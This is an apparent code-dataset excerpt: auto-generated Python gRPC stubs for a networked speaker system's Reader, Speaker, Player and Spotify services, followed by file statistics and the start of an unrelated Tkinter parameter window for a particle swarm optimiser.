servicer.GetInputList,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.InputInfo.SerializeToString,
),
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.ReaderStatus.SerializeToString,
),
'SetMute': grpc.unary_unary_rpc_method_handler(
servicer.SetMute,
request_deserializer=speaker_dot_system__pb2.MuteValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=speaker_dot_system__pb2.VolumeSingleValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Reader', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Reader(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetInputList(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/Reader/GetInputList',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.InputInfo.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Reader/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.ReaderStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Reader/SetMute',
speaker_dot_system__pb2.MuteValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolume(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Reader/SetVolume',
speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
class SpeakerStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetConnectedStreams = channel.unary_stream(
'/Speaker/GetConnectedStreams',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpeakerStreamInfo.FromString,
)
self.GetStatus = channel.unary_unary(
'/Speaker/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpeakerStatus.FromString,
)
self.SetMute = channel.unary_unary(
'/Speaker/SetMute',
request_serializer=speaker_dot_system__pb2.MuteValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolume = channel.unary_unary(
'/Speaker/SetVolume',
request_serializer=speaker_dot_system__pb2.VolumeValues.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolumeUniform = channel.unary_unary(
'/Speaker/SetVolumeUniform',
request_serializer=speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.ConnectStreams = channel.stream_unary(
'/Speaker/ConnectStreams',
request_serializer=speaker_dot_system__pb2.ServerHost.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.DisconnectStreams = channel.stream_unary(
'/Speaker/DisconnectStreams',
request_serializer=speaker_dot_system__pb2.ServerIdent.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.DisconnectAllStreams = channel.unary_unary(
'/Speaker/DisconnectAllStreams',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class SpeakerServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetConnectedStreams(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMute(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolumeUniform(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ConnectStreams(self, request_iterator, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DisconnectStreams(self, request_iterator, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DisconnectAllStreams(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SpeakerServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetConnectedStreams': grpc.unary_stream_rpc_method_handler(
servicer.GetConnectedStreams,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpeakerStreamInfo.SerializeToString,
),
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpeakerStatus.SerializeToString,
),
'SetMute': grpc.unary_unary_rpc_method_handler(
servicer.SetMute,
request_deserializer=speaker_dot_system__pb2.MuteValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=speaker_dot_system__pb2.VolumeValues.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolumeUniform': grpc.unary_unary_rpc_method_handler(
servicer.SetVolumeUniform,
request_deserializer=speaker_dot_system__pb2.VolumeSingleValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'ConnectStreams': grpc.stream_unary_rpc_method_handler(
servicer.ConnectStreams,
request_deserializer=speaker_dot_system__pb2.ServerHost.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'DisconnectStreams': grpc.stream_unary_rpc_method_handler(
servicer.DisconnectStreams,
request_deserializer=speaker_dot_system__pb2.ServerIdent.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'DisconnectAllStreams': grpc.unary_unary_rpc_method_handler(
servicer.DisconnectAllStreams,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Speaker', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Speaker(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetConnectedStreams(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/Speaker/GetConnectedStreams',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpeakerStreamInfo.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpeakerStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/SetMute',
speaker_dot_system__pb2.MuteValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolume(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/SetVolume',
speaker_dot_system__pb2.VolumeValues.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolumeUniform(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/SetVolumeUniform',
speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ConnectStreams(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_unary(request_iterator, target, '/Speaker/ConnectStreams',
speaker_dot_system__pb2.ServerHost.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DisconnectStreams(request_iterator,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.stream_unary(request_iterator, target, '/Speaker/DisconnectStreams',
speaker_dot_system__pb2.ServerIdent.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DisconnectAllStreams(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Speaker/DisconnectAllStreams',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
class PlayerStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetStatus = channel.unary_unary(
'/Player/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.PlayerStatus.FromString,
)
self.Start = channel.unary_unary(
'/Player/Start',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.Stop = channel.unary_unary(
'/Player/Stop',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetLocation = channel.unary_unary(
'/Player/SetLocation',
request_serializer=speaker_dot_system__pb2.PlayerLocation.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetMute = channel.unary_unary(
'/Player/SetMute',
request_serializer=speaker_dot_system__pb2.MuteValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetVolume = channel.unary_unary(
'/Player/SetVolume',
request_serializer=speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class PlayerServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetLocation(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetMute(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetVolume(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_PlayerServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.PlayerStatus.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetLocation': grpc.unary_unary_rpc_method_handler(
servicer.SetLocation,
request_deserializer=speaker_dot_system__pb2.PlayerLocation.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetMute': grpc.unary_unary_rpc_method_handler(
servicer.SetMute,
request_deserializer=speaker_dot_system__pb2.MuteValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetVolume': grpc.unary_unary_rpc_method_handler(
servicer.SetVolume,
request_deserializer=speaker_dot_system__pb2.VolumeSingleValue.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Player', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Player(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.PlayerStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/Start',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/Stop',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetLocation(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/SetLocation',
speaker_dot_system__pb2.PlayerLocation.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/SetMute',
speaker_dot_system__pb2.MuteValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetVolume(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Player/SetVolume',
speaker_dot_system__pb2.VolumeSingleValue.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
class SpotifyStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCredentials = channel.unary_unary(
'/Spotify/GetCredentials',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpotifyCredentials.FromString,
)
self.GetOptions = channel.unary_unary(
'/Spotify/GetOptions',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpotifyOptions.FromString,
)
self.GetStatus = channel.unary_unary(
'/Spotify/GetStatus',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.SpotifyStatus.FromString,
)
self.Start = channel.unary_unary(
'/Spotify/Start',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.Stop = channel.unary_unary(
'/Spotify/Stop',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetCredentials = channel.unary_unary(
'/Spotify/SetCredentials',
request_serializer=speaker_dot_system__pb2.SpotifyCredentials.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetBitRate = channel.unary_unary(
'/Spotify/SetBitRate',
request_serializer=speaker_dot_system__pb2.SpotifyOptBitRate.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
self.SetName = channel.unary_unary(
'/Spotify/SetName',
request_serializer=speaker_dot_system__pb2.SpotifyOptName.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class SpotifyServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetCredentials(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetOptions(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStatus(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Start(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Stop(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetCredentials(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetBitRate(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetName(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SpotifyServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCredentials': grpc.unary_unary_rpc_method_handler(
servicer.GetCredentials,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpotifyCredentials.SerializeToString,
),
'GetOptions': grpc.unary_unary_rpc_method_handler(
servicer.GetOptions,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpotifyOptions.SerializeToString,
),
'GetStatus': grpc.unary_unary_rpc_method_handler(
servicer.GetStatus,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.SpotifyStatus.SerializeToString,
),
'Start': grpc.unary_unary_rpc_method_handler(
servicer.Start,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'Stop': grpc.unary_unary_rpc_method_handler(
servicer.Stop,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetCredentials': grpc.unary_unary_rpc_method_handler(
servicer.SetCredentials,
request_deserializer=speaker_dot_system__pb2.SpotifyCredentials.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetBitRate': grpc.unary_unary_rpc_method_handler(
servicer.SetBitRate,
request_deserializer=speaker_dot_system__pb2.SpotifyOptBitRate.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
'SetName': grpc.unary_unary_rpc_method_handler(
servicer.SetName,
request_deserializer=speaker_dot_system__pb2.SpotifyOptName.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Spotify', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Spotify(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetCredentials(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/GetCredentials',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpotifyCredentials.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetOptions(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/GetOptions',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpotifyOptions.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetStatus(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/GetStatus',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.SpotifyStatus.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/Start',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/Stop',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetCredentials(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/SetCredentials',
speaker_dot_system__pb2.SpotifyCredentials.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetBitRate(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/SetBitRate',
speaker_dot_system__pb2.SpotifyOptBitRate.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetName(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Spotify/SetName',
speaker_dot_system__pb2.SpotifyOptName.SerializeToString,
speaker_dot_system__pb2.Result.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
| 43.522073
| 101
| 0.656295
| 4,174
| 45,350
| 6.788213
| 0.032343
| 0.040658
| 0.071716
| 0.085163
| 0.930543
| 0.922178
| 0.87785
| 0.844498
| 0.844498
| 0.820922
| 0
| 0.005197
| 0.270165
| 45,350
| 1,041
| 102
| 43.563881
| 0.850867
| 0.064741
| 0
| 0.736416
| 1
| 0
| 0.062793
| 0.00842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076301
| false
| 0
| 0.003468
| 0.03237
| 0.12948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69fa739b307d48215b850736d03b0745bc248b5a
| 8,781
|
py
|
Python
|
HPSO/paramWindow.py
|
andrejadd/ABC-bee-opt
|
746b2f8eb8eeab27e0af515aa129ad8a00b035e5
|
[
"MIT"
] | null | null | null |
HPSO/paramWindow.py
|
andrejadd/ABC-bee-opt
|
746b2f8eb8eeab27e0af515aa129ad8a00b035e5
|
[
"MIT"
] | null | null | null |
HPSO/paramWindow.py
|
andrejadd/ABC-bee-opt
|
746b2f8eb8eeab27e0af515aa129ad8a00b035e5
|
[
"MIT"
] | null | null | null |
import pso
from Tkinter import *
import tkSimpleDialog
import Pmw
OPTMOVESTYLE_SELECTION = ["randomOptMove", "linearOptMove", "randomLinearOptMove", "randomDistanceOptMove"]
UPDATESTYLE_SELECTION = ["updatePeriodic", "updateOnGoal"]
DETECTIONMETHOD_SELECTION = ["upToDate", "gbestDetectChange", "scoutDetectChange"]
RESPONSEMETHOD_SELECTION = ["noResponse", "applyScout", "randomize10", "randomize10reset", \
"randomize16reset", "randomize22reset", "subSwarmsTemporalMerge", "subSwarmsAdaptiveMerge"]
class ParameterWindow:
win = None
pso = None
e1 = None
e2 = None
menu1 = None
menu2 = None
menu3 = None
menu4 = None
moveFrequency = 0
moveDistance = 0.0
def show(self):
self.win.lift()
def apply(self):
#self.pso.optFunction.set_moveFrequency(int(self.e1.get()))
#self.pso.optFunction.set_moveDistance(float(self.e2.get()))
#self.pso.optFunction.set_optMoveStyle(self.menu1.index(self.menu1.getvalue()))
#self.pso.optFunction.set_updateStyle(self.menu2.index(self.menu2.getvalue()))
#self.pso.set_detectionMethod(self.menu3.index(self.menu3.getvalue()))
#self.pso.set_responseMethod(self.menu4.index(self.menu4.getvalue()))
self.pso.setDynamicParameters(int(self.e1.get()), float(self.e2.get()), self.menu1.index(self.menu1.getvalue()),\
self.menu2.index(self.menu2.getvalue()), self.menu3.index(self.menu3.getvalue()), \
self.menu4.index(self.menu4.getvalue()))
self.win.destroy()
def __init__(self, master, pso_in):
self.win = Toplevel()
self.pso = pso_in
label = Label(self.win, text="MoveFrequency")
label.grid(row=0)
self.moveFrequency = self.pso.optFunction.get_moveFrequency()
self.e1 = Entry(self.win)
self.e1.insert(END,str(self.moveFrequency))
self.e1.grid(row=0, column=1)
label = Label(self.win, text="MoveDistance")
label.grid(row=1)
self.moveDistance = self.pso.optFunction.get_moveDistance()
self.e2 = Entry(self.win)
self.e2.insert(END,str(self.moveDistance))
self.e2.grid(row=1, column=1)
# self.l1 = Listbox(self.win, selectmode=SINGLE, height=2 )
# for item in OPTMOVESTYLE_SELECTION:
# self.l1.insert(END, item)
# self.l1.select_set(self.optFunction.get_optMoveStyle())
# self.l1.activate(self.optFunction.get_optMoveStyle())
# self.l1.grid(row=2, column=1)
self.menu1 = Pmw.OptionMenu (self.win,
labelpos = 'w',
